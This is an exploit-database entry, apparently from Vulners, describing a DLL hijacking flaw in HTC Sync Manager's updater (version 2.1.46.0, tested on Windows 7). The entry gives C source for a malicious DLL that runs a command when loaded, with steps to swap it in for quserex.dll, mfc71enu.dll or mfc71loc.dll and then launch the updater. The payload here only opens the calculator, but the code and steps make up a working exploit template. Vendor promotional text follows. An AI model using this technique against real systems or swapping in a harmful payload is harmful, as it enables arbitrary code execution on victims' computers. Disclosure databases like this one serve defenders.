`Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution
Author: Iranian_Dark_Coders_Team
Discovered by A.CH12
Software Link: http://www.htc.com/
Version: 2.1.46.0
Tested on: Windows 7
// :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######::
// ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##:
// :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##:
// '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######::
// #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##::::::::
// ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##::::::::
// ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########:
// ..:::::..:::::...::::::......:::..:::::..:::......::.........::
=============================================================
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
=============================================================
Instructions:
1. Compile dll
2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll
3. Launch HTCSyncManagerUpdate
4. Bo0o0o0o0o0o0o0m !
Greet to my Lovely friends :
nimaarek , D.S (ASA);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation